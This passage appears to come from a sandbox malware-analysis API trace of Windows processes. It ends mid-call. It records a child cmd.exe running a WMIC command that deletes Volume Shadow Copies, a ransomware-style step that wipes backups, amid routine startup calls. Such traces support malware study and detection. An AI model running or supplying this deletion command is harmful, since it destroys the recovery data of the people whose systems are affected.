returned 0x7fef4af482c [0122.607] _kbhit () returned 0x0 [0122.608] free (_Block=0x4b6f20) [0122.608] free (_Block=0x4bcac0) [0122.608] free (_Block=0x4bcaa0) [0122.608] free (_Block=0x4bca80) [0122.608] free (_Block=0x4bca60) [0122.608] free (_Block=0x4b70a0) [0122.608] free (_Block=0x4bcb40) [0122.608] free (_Block=0x4b85c0) [0122.608] free (_Block=0x4bd020) [0122.608] free (_Block=0x4bcbc0) [0122.608] free (_Block=0x4bcfa0) [0122.608] free (_Block=0x4bcae0) [0122.608] free (_Block=0x4bcbe0) [0122.608] free (_Block=0x4b7140) [0122.608] free (_Block=0x4b6e00) [0122.608] free (_Block=0x4bcff0) [0122.608] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0122.608] free (_Block=0x4bce20) [0122.609] free (_Block=0x4bcb00) [0122.609] free (_Block=0x4bcb20) [0122.609] free (_Block=0x4bcf30) [0122.609] free (_Block=0x4bcb60) [0122.609] free (_Block=0x4b7ee0) [0122.609] free (_Block=0x4b7f30) [0122.609] free (_Block=0x4b7f80) [0122.609] free (_Block=0x4bcb80) [0122.609] free (_Block=0x4b6a20) [0122.609] free (_Block=0x4b6de0) [0122.609] free (_Block=0x4b8040) [0122.609] free (_Block=0x4b6dc0) [0122.609] free (_Block=0x4b8000) [0122.609] free (_Block=0x4b6d60) [0122.609] free (_Block=0x4b6d80) [0122.609] free (_Block=0x4b6c40) [0122.609] free (_Block=0x4b6c60) [0122.609] free (_Block=0x4b6be0) [0122.609] free (_Block=0x4b6c00) [0122.609] free (_Block=0x4b6ca0) [0122.609] free (_Block=0x4b6cc0) [0122.609] free (_Block=0x4b6d00) [0122.609] free (_Block=0x4b6d20) [0122.609] free (_Block=0x4b6b20) [0122.609] free (_Block=0x4b6b40) [0122.609] free (_Block=0x4b6ac0) [0122.609] free (_Block=0x4b6ae0) [0122.610] free (_Block=0x4b6b80) [0122.610] free (_Block=0x4b6ba0) [0122.610] free (_Block=0x4b6a60) [0122.610] free (_Block=0x4b6a80) [0122.610] free (_Block=0x4b69d0) [0122.610] free (_Block=0x4b69a0) [0122.610] free (_Block=0x4b6e90) [0122.610] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x2 [0122.610] WbemLocator:IUnknown:Release (This=0x203b28) returned 0x0 [0122.610] WbemLocator:IUnknown:Release (This=0x203a98) returned 0x0 [0122.610] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x1 [0122.610] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0122.610] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x0 [0122.610] free (_Block=0x4bc9e0) [0122.610] free (_Block=0x4bca00) [0122.610] free (_Block=0x4b8540) [0122.610] free (_Block=0x4bca20) [0122.610] free (_Block=0x4bca40) [0122.610] free (_Block=0x4b8580) [0122.611] free (_Block=0x4bc860) [0122.611] free (_Block=0x4bc880) [0122.611] free (_Block=0x4b83c0) [0122.611] free (_Block=0x4bc8a0) [0122.611] free (_Block=0x4bc8c0) [0122.611] free (_Block=0x4b8400) [0122.611] free (_Block=0x4bc7e0) [0122.611] free (_Block=0x4bc800) [0122.611] free (_Block=0x4b8340) [0122.611] free (_Block=0x4bc820) [0122.611] free (_Block=0x4bc840) [0122.611] free (_Block=0x4b8380) [0122.611] free (_Block=0x4bc960) [0122.611] free (_Block=0x4bc980) [0122.611] free (_Block=0x4b84c0) [0122.611] free (_Block=0x4bc9a0) [0122.611] free (_Block=0x4bc9c0) [0122.611] free (_Block=0x4b8500) [0122.611] free (_Block=0x4bc760) [0122.611] free (_Block=0x4bc780) [0122.611] free (_Block=0x4b82c0) [0122.611] free (_Block=0x4bc7a0) [0122.611] free (_Block=0x4bc7c0) [0122.611] free (_Block=0x4b8300) [0122.611] free (_Block=0x4bc8e0) [0122.612] free (_Block=0x4bc900) [0122.612] free (_Block=0x4b8440) [0122.612] free (_Block=0x4bc920) [0122.612] free (_Block=0x4bc940) [0122.612] free (_Block=0x4b8480) [0122.612] free (_Block=0x4bc6a0) [0122.612] free (_Block=0x4bc6c0) [0122.612] free (_Block=0x4b8200) [0122.612] free (_Block=0x4bc560) [0122.612] free (_Block=0x4bc580) [0122.612] free (_Block=0x4b80c0) [0122.612] free (_Block=0x4b6e50) [0122.612] free (_Block=0x4b6e70) [0122.612] free (_Block=0x4b8080) [0122.612] free (_Block=0x4bc5e0) [0122.612] free (_Block=0x4bc600) [0122.612] free (_Block=0x4b8140) [0122.612] free (_Block=0x4bc6e0) [0122.612] free (_Block=0x4bc700) [0122.612] free (_Block=0x4b8240) [0122.612] free (_Block=0x4bc5a0) [0122.612] free (_Block=0x4bc5c0) [0122.612] free (_Block=0x4b8100) [0122.612] free (_Block=0x4bc620) [0122.612] free (_Block=0x4bc640) [0122.613] free (_Block=0x4b8180) [0122.613] free (_Block=0x4bc660) [0122.613] free (_Block=0x4bc680) [0122.613] free (_Block=0x4b81c0) [0122.613] free (_Block=0x4bc720) [0122.613] free (_Block=0x4bc740) [0122.613] free (_Block=0x4b8280) [0122.613] CoUninitialize () [0122.633] exit (_Code=0) [0122.633] free (_Block=0x4bcd30) [0122.633] free (_Block=0x4b7ea0) [0122.633] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0122.633] free (_Block=0x4b6f40) [0122.633] free (_Block=0x4b6a40) [0122.633] free (_Block=0x4b7e60) [0122.633] free (_Block=0x4b7e20) [0122.633] free (_Block=0x4b7dd0) [0122.633] free (_Block=0x4b7d90) [0122.633] free (_Block=0x4b7d30) [0122.633] free (_Block=0x4b5a90) [0122.633] free (_Block=0x4b5a50) [0122.633] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0122.634] free (_Block=0x4bcec0) Thread: id = 246 os_tid = 0x6c0 Thread: id = 247 os_tid = 0xb38 Thread: id = 248 os_tid = 0x7d0 Thread: id = 249 os_tid = 0x97c Thread: id = 250 os_tid = 0x9ac Process: id = "48" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x22d35000" os_pid = "0x71c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 251 os_tid = 0x8cc [0122.748] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd50 | out: lpSystemTimeAsFileTime=0x16fd50*(dwLowDateTime=0x50985090, dwHighDateTime=0x1d68245)) [0122.748] GetCurrentProcessId () returned 0x71c [0122.748] GetCurrentThreadId () returned 0x8cc [0122.748] GetTickCount () returned 0x1154329 [0122.748] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd58 | out: lpPerformanceCount=0x16fd58*=24264158809) returned 1 [0122.749] GetModuleHandleW (lpModuleName=0x0) returned 0x4a4a0000 [0122.749] __set_app_type (_Type=0x1) [0122.749] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4c7810) returned 0x0 [0122.749] __getmainargs (in: _Argc=0x4a4ea608, _Argv=0x4a4ea618, _Env=0x4a4ea610, _DoWildCard=0, _StartInfo=0x4a4ce0f4 | out: _Argc=0x4a4ea608, _Argv=0x4a4ea618, _Env=0x4a4ea610) returned 0 [0122.749] GetCurrentThreadId () returned 0x8cc [0122.749] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8cc) returned 0x3c [0122.750] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0122.750] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0122.750] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.752] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.752] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fce8 | out: phkResult=0x16fce8*=0x0) returned 0x2 [0122.752] VirtualQuery (in: lpAddress=0x16fcd0, lpBuffer=0x16fc50, dwLength=0x30 | out: lpBuffer=0x16fc50*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0122.752] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fc50, dwLength=0x30 | out: lpBuffer=0x16fc50*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0122.752] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fc50, dwLength=0x30 | out: lpBuffer=0x16fc50*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0122.752] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16fc50, dwLength=0x30 | out: lpBuffer=0x16fc50*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0122.752] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fc50, dwLength=0x30 | out: lpBuffer=0x16fc50*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0122.752] GetConsoleOutputCP () returned 0x1b5 [0122.753] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4dbfe0 | out: lpCPInfo=0x4a4dbfe0) returned 1 [0122.754] SetConsoleCtrlHandler (HandlerRoutine=0x4a4c3184, Add=1) returned 1 [0122.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0122.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0122.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0122.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4ce194 | out: lpMode=0x4a4ce194) returned 1 [0122.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0122.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0122.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0122.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4ce198 | out: lpMode=0x4a4ce198) returned 1 [0122.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0122.755] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0122.755] GetEnvironmentStringsW () returned 0x288b90* [0122.755] GetProcessHeap () returned 0x270000 [0122.755] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x289620 [0122.755] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0122.755] GetProcessHeap () returned 0x270000 [0122.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8) returned 0x288a10 [0122.756] GetEnvironmentStringsW () returned 0x288b90* [0122.756] GetProcessHeap () returned 0x270000 [0122.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x28a0b0 [0122.756] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0122.756] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eba8 | out: phkResult=0x16eba8*=0x44) returned 0x0 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x18, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x1, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x1, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x0, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x40, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x40, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.756] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x40, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.756] RegCloseKey (hKey=0x44) returned 0x0 [0122.757] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eba8 | out: phkResult=0x16eba8*=0x44) returned 0x0 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x40, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x1, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x1, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x0, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x9, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x4, lpData=0x16ebc0*=0x9, lpcbData=0x16eba4*=0x4) returned 0x0 [0122.757] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eba0, lpData=0x16ebc0, lpcbData=0x16eba4*=0x1000 | out: lpType=0x16eba0*=0x0, lpData=0x16ebc0*=0x9, lpcbData=0x16eba4*=0x1000) returned 0x2 [0122.757] RegCloseKey (hKey=0x44) returned 0x0 [0122.757] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51745f [0122.757] srand (_Seed=0x5f51745f) [0122.757] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" [0122.757] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" [0122.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4dc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0122.758] GetProcessHeap () returned 0x270000 [0122.758] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x28ab40 [0122.758] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0122.758] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0122.758] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.758] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0122.758] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0122.758] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0122.758] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0122.758] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0122.758] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0122.758] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0122.758] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0122.758] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0122.758] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0122.759] GetProcessHeap () returned 0x270000 [0122.759] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x289620 | out: hHeap=0x270000) returned 1 [0122.759] GetEnvironmentStringsW () returned 0x288b90* [0122.759] GetProcessHeap () returned 0x270000 [0122.759] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa94) returned 0x28ad60 [0122.759] FreeEnvironmentStringsW (penv=0x288b90) returned 1 [0122.759] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0122.759] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0122.759] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0122.759] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0122.759] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0122.759] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0122.759] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0122.759] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0122.759] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0122.759] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0122.759] GetProcessHeap () returned 0x270000 [0122.759] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5c) returned 0x28b800 [0122.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0122.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f9b0, lpFilePart=0x16f990 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f990*="Desktop") returned 0x25 [0122.760] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0122.760] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6c0 | out: lpFindFileData=0x16f6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x28b870 [0122.760] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0122.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f6c0 | out: lpFindFileData=0x16f6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x28b870 [0122.760] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0122.760] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0122.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f6c0 | out: lpFindFileData=0x16f6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x28b870 [0122.761] FindClose (in: hFindFile=0x28b870 | out: hFindFile=0x28b870) returned 1 [0122.761] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0122.761] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0122.761] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0122.761] GetProcessHeap () returned 0x270000 [0122.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ad60 | out: hHeap=0x270000) returned 1 [0122.761] GetEnvironmentStringsW () returned 0x28b870* [0122.761] GetProcessHeap () returned 0x270000 [0122.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28c360 [0122.761] FreeEnvironmentStringsW (penv=0x28b870) returned 1 [0122.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4dc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0122.761] GetProcessHeap () returned 0x270000 [0122.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b800 | out: hHeap=0x270000) returned 1 [0122.762] GetProcessHeap () returned 0x270000 [0122.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4016) returned 0x28ce50 [0122.762] GetProcessHeap () returned 0x270000 [0122.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe4) returned 0x289680 [0122.762] GetProcessHeap () returned 0x270000 [0122.762] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce50 | out: hHeap=0x270000) returned 1 [0122.762] GetConsoleOutputCP () returned 0x1b5 [0122.762] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4dbfe0 | out: lpCPInfo=0x4a4dbfe0) returned 1 [0122.762] GetUserDefaultLCID () returned 0x409 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4d7b50, cchData=8 | out: lpLCData=":") returned 2 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fac0, cchData=128 | out: lpLCData="0") returned 2 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fac0, cchData=128 | out: lpLCData="0") returned 2 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fac0, cchData=128 | out: lpLCData="1") returned 2 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4ea740, cchData=8 | out: lpLCData="/") returned 2 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4ea4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0122.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4ea460, cchData=32 | out: lpLCData="Tue") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4ea420, cchData=32 | out: lpLCData="Wed") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4ea3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4ea3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4ea360, cchData=32 | out: lpLCData="Sat") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4ea700, cchData=32 | out: lpLCData="Sun") returned 4 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4d7b40, cchData=8 | out: lpLCData=".") returned 2 [0122.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4ea4e0, cchData=8 | out: lpLCData=",") returned 2 [0122.764] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0122.765] GetProcessHeap () returned 0x270000 [0122.765] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20c) returned 0x2897e0 [0122.765] GetConsoleTitleW (in: lpConsoleTitle=0x2897e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0122.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0122.765] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0122.765] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0122.765] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0122.766] GetProcessHeap () returned 0x270000 [0122.766] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4012) returned 0x28ce50 [0122.766] GetProcessHeap () returned 0x270000 [0122.766] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce50 | out: hHeap=0x270000) returned 1 [0122.769] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0122.769] _wcsicmp (_String1="FOR", 